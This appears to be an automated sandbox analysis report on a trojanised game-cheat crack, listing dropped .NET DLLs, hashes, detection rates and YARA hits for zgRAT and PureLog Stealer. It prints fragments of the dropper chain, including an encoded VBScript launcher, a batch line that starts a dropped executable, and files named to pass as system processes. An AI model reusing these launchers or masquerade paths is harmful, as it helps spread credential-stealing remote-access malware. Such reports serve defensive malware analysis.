                                                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):85504
                                                                                      Entropy (8bit):5.8769270258874755
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                      Process:C:\Program Files\Windows NT\smss.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):294912
                                                                                      Entropy (8bit):6.010605469502259
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                      MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                      SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                      SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                      SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 11%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                                      Process:C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):69632
                                                                                      Entropy (8bit):5.932541123129161
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):23552
                                                                                      Entropy (8bit):5.519109060441589
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                      MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                      SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                      SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                      SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                      Process:C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):294912
                                                                                      Entropy (8bit):6.010605469502259
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                      MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                      SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                      SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                      SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 11%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                                      Process:C:\Program Files\Windows NT\smss.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):46592
                                                                                      Entropy (8bit):5.870612048031897
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                      MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                      SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                      SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                      SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):46592
                                                                                      Entropy (8bit):5.870612048031897
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                      MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                      SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                      SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                      SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                      Process:C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):85504
                                                                                      Entropy (8bit):5.8769270258874755
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                      Process:C:\Program Files\Windows NT\smss.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):40448
                                                                                      Entropy (8bit):5.7028690200758465
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                      MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                      SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                      SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                      SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Windows NT\smss.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):23552
                                                                                      Entropy (8bit):5.519109060441589
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                      MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                      SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                      SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                      SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2545152
                                                                                      Entropy (8bit):7.696493390112077
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:gZP6vgp9kHCayPPLHCLXbX4pKXDys7yqmHji4Rn:goYp9kiHPbCfX4rsu3GQ
                                                                                      MD5:B3F6318C958712D0C78B5A969EE2EFD1
                                                                                      SHA1:ABF4CF8782F366A10DF36FF706AFEAFFD07DF514
                                                                                      SHA-256:E2D2A557CF97F4D81A7D476D3FB5E43405F6E79FE266032DD3D8650D6B81D846
                                                                                      SHA-512:67F987CA27548C3EF21E7C27990653E1443B0A761262EF2351BF1FD670903E7652E1A215A206B2FC197DBA33A661E762F410AB63B1605A2571C1872C75C78912
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 79%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y*.g..................&...........&.. ....'...@.. .......................@'...........@...................................&.K.....'. .................... '...................................................... ............... ..H............text...4.&.. ....&................. ..`.rsrc... .....'.......&.............@....reloc....... '.......&.............@..B..................&.....H.......|.......................V.&......................................0..........(.... ........8........E....)...N...*.......8$...(.... ....~f...{i...:....& ....8....*(.... ....~f...{....9....& ....8....(.... ....~f...{....:....& ....8y......0..'....... ........8........E........M.......)...............8....8.... ....~f...{v...:....& ....8....8t... ....~f...{....:....& ....8....~....(S... .... .... ....s....~....(W....... ....8\...~....9B... ....8H...r...ps....z*....~....(
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:ASCII text, with very long lines (363), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):363
                                                                                      Entropy (8bit):5.849483565001641
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:+jYp8fWMD9u4nHyPcKAlV6r6LVyngrZbd+Rzu8wcuNMmWFAJ3zUTaJkuIP:+xfWiDS7Aly6LVyniR+Ju8xuhRzUTac
                                                                                      MD5:7281239AA8C7F2418BC47A72C40C91E4
                                                                                      SHA1:F006BFFCD5D3FBF23FA04ACB6EE26FA97369DCEC
                                                                                      SHA-256:970E7E70556A80FA8E42CEDCF00A28AC395197A2A533C2D14127A174F4CED15B
                                                                                      SHA-512:458D42D95FC94AF7CB33CED6FCE5CE7CA7748D0353C0BE077EB8E50C0FDCE7E2698710F6212101819F80C5B34D17DFC837FB8F580AE4C87588DDB6A1913F2B9F
                                                                                      Malicious:false
                                                                                      Preview:vz5jhH9xgFsFG7kkYkhDida1P4tpAzwPD2nGW3UwTeX78V1BySWO4ZxRZDTmYUwrSdCNTdOePuuDFc24Cr0sciUoFVrSjrY9rqpfTorVD19JptM6LZjqdEOuIXI8v55hWvWYxXlY9foliK9VJvHKIrfnc5X5gtjH6cx4XxIyxLq8ZmL7YwyAyuZoPs62Aq2Q6gpGXF8WmTX6AgO0tZgu4iTLCIop0QyGTZC37FkTycXeXcnteGIkKHWXMdDPbSfWfQnkeV2ozM6bLyyke4LuHN6LDoqdBV2f6B9GzDPJNev8L4MYpdugHuOSUchzoYneTafJzrvbpBhnb89IcRyikWXMwrwWfaey0RovZCj7rS1
                                                                                      Process:C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):85
                                                                                      Entropy (8bit):4.868970971790085
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:oAQfVzvAmkgXwU6AjHJREM0X3Ng3Bvn:oAQ9zvGg13HJiMl3B
                                                                                      MD5:2F3C3A6C3A477313D6AB3D03F90BE8C2
                                                                                      SHA1:1AFE24A9F578C49B35C34855441455EBE4F04369
                                                                                      SHA-256:ECFF07D881B76F45AA8142EB1CB8A1E21F8F1F51217968CC623AA7FF4DFB4AEE
                                                                                      SHA-512:FE223A07EB4B7C8799ECDAF4E149F8D3F902648BDDAA55EFA28095DB2320FF796DD017B3059CBA6282E0E085C7B30AA2A4202105E48C7DA6C40B19484C3C2D8F
                                                                                      Malicious:false
                                                                                      Preview:%heePzUeJo%%CJtr%..%jPEE%"C:\portsurrogateFontCrt/BlockcontainerWin.exe"%RdAjJxBZVCA%
                                                                                      Process:C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):211
                                                                                      Entropy (8bit):5.7766808097008155
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:GEwqK+NkLzWbHK/818nZNDd3RL1wQJRAZI80IqwM1Gkxs:G1MCzWLKG4d3XBJGi80Twku
                                                                                      MD5:0B67BF20E24EAC268C690E05E9E59711
                                                                                      SHA1:2768696C3FFF8AADE04325EAD3AD4366E9393084
                                                                                      SHA-256:88907A441F365C8D0EC4F523F0F38F97434528CA151B928CF8F1C29DB80AFE8A
                                                                                      SHA-512:64D956B71DC25615B8DEEA4CE5D8DC3F2B79E7CA6DFA289FB5C73F3FE63E14698A739DDCBB3D257569342D6AFE543AA76837F30499405097B356CDAA17B05FCD
                                                                                      Malicious:false
                                                                                      Preview:#@~^ugAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vvT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJwGMYkEDMWTCY.sGxDZ.OJz:4uh_L*NWU64kc4CYES,!SP6CVk+LzwAAA==^#~@.
                                                                                      Process:C:\Windows\System32\PING.EXE
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):502
                                                                                      Entropy (8bit):4.621947447102293
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:PYI5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:DdUOAokItULVDv
                                                                                      MD5:3C2549B8E8B5460A95748CCC3CD1BEA8
                                                                                      SHA1:99895C6D36EC820FE6A210E186B09AF7CD089696
                                                                                      SHA-256:EAFA177E97F49A260A5951D5B4EC13790F9D909597F417523B07109A96482BF7
                                                                                      SHA-512:A75E3251EAD6D1CDDB9D54ED989FCD1817A395745C831BF8EAF70CED5EA62C7B5B957C699391D3664CF401B88E97E2E8112C5C2AB94FEC39B22564A56D6D43D0
                                                                                      Malicious:false
                                                                                      Preview:..Pinging 936905 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.636132306906945
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:NursultanAlphaCrack.bat.exe
                                                                                      File size:2'866'940 bytes
                                                                                      MD5:df15d1f8f7cc71bb1889895b367c7d2c
                                                                                      SHA1:4a9d087d105976a1f7a1c7444a25b5e0a8ac0622
                                                                                      SHA256:09bdb3282e1927dcb848126823280b066827c5dadd17ee6d445922440889d8f2
                                                                                      SHA512:3c5215abd2ca1cee15ae3592eea15cebec2ce0127221c96634ad07ea53cf9fa397bfecd229a56b38c879f2fe6dadfc8bd58ac6541bcfc6eba65017d4b3694e4f
                                                                                      SSDEEP:49152:IBJVZP6vgp9kHCayPPLHCLXbX4pKXDys7yqmHji4Rnh:y7oYp9kiHPbCfX4rsu3GQh
                                                                                      TLSH:C6D5D006A5D19E37C3755B318657023E92A0D7223622EB4F760F25D7AC077F18EB22A7
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                                                      Icon Hash:1515d4d4442f2d2d
                                                                                      Entrypoint:0x41f530
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                                      Instruction
                                                                                      call 00007FCA7CED816Bh
                                                                                      jmp 00007FCA7CED7A7Dh
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      push esi
                                                                                      push dword ptr [ebp+08h]
                                                                                      mov esi, ecx
                                                                                      call 00007FCA7CECA8C7h
                                                                                      mov dword ptr [esi], 004356D0h
                                                                                      mov eax, esi
                                                                                      pop esi
                                                                                      pop ebp
                                                                                      retn 0004h
                                                                                      and dword ptr [ecx+04h], 00000000h
                                                                                      mov eax, ecx
                                                                                      and dword ptr [ecx+08h], 00000000h
                                                                                      mov dword ptr [ecx+04h], 004356D8h
                                                                                      mov dword ptr [ecx], 004356D0h
                                                                                      ret
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      push esi
                                                                                      mov esi, ecx
                                                                                      lea eax, dword ptr [esi+04h]
                                                                                      mov dword ptr [esi], 004356B8h
                                                                                      push eax
                                                                                      call 00007FCA7CEDAF0Fh
                                                                                      test byte ptr [ebp+08h], 00000001h
                                                                                      pop ecx
                                                                                      je 00007FCA7CED7C0Ch
                                                                                      push 0000000Ch
                                                                                      push esi
                                                                                      call 00007FCA7CED71C9h
                                                                                      pop ecx
                                                                                      pop ecx
                                                                                      mov eax, esi
                                                                                      pop esi
                                                                                      pop ebp
                                                                                      retn 0004h
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      sub esp, 0Ch
                                                                                      lea ecx, dword ptr [ebp-0Ch]
                                                                                      call 00007FCA7CECA842h
                                                                                      push 0043BEF0h
                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                      push eax
                                                                                      call 00007FCA7CEDA9C9h
                                                                                      int3
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      sub esp, 0Ch
                                                                                      lea ecx, dword ptr [ebp-0Ch]
                                                                                      call 00007FCA7CED7B88h
                                                                                      push 0043C0F4h
                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                      push eax
                                                                                      call 00007FCA7CEDA9ACh
                                                                                      int3
                                                                                      jmp 00007FCA7CEDC447h
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      push 00422900h
                                                                                      push dword ptr fs:[00000000h]
                                                                                      Programming Language:
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
